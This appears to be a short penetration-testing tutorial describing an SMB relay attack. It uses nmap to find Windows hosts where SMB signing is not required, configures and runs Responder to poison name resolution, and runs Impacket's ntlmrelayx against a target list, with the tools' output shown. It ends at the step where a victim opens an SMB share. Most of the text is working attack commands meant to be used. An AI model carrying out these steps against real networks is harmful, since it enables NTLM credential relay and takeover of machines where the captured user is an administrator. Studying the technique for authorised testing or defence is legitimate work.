SMB Relay

SMB Relay through Impacket Responder and NTLMNrelayx

Prerequisites

SMB Signing

SMB Signing is enabled but not required (disabled) on Windows workstations and enabled and required on Windows Servers by default.

Nmap - SMB Security Mode Discovery

There are two nmap scripts for SMB message signing mode detection, one for SMBv1 and for SMBv2 we are going to use.

nmap --script smb2-security-mode

nmap --script smb2-security-mode.nse -p 445 127.0.0.1

...
PORT    STATE SERVICE
445/tcp open  microsoft-ds
MAC Address: 12:34:56:78:9A:BC (Unknown)

Host script results:
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required

Copy all targets (IPs/hostnames) into targets.txt.

Admin Account

A user has to be admin on the relayed machine (You can't do SMB relay without an admin account).

Responder

Modify Responder.conf

# locate Responder.conf
/usr/share/responder/Responder.conf

Disable these options

• SMB = Off

• HTTP = Off

Start Responder

responder -I eth0 -rdw -v

NTLMN RelayX

The Relay server starts SMB and HTTP server (that's why they are disabled in the responder).

#locate ntlmrelayx
impacket-ntlmrelayx -tf ./targets.txt -smb2support

..
Impacket v0.9.19 - Copyright 2019 SecureAuth Corporation

[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client MSSQL loaded..
[*] Protocol Client SMTP loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client IMAP loaded..
[*] Running in relay mode to hosts in targetfile
[*] Setting up SMB Server
[*] Setting up HTTP Server

[*] Servers started, waiting for connections

User Interaction

Now a user needs to address SMB folder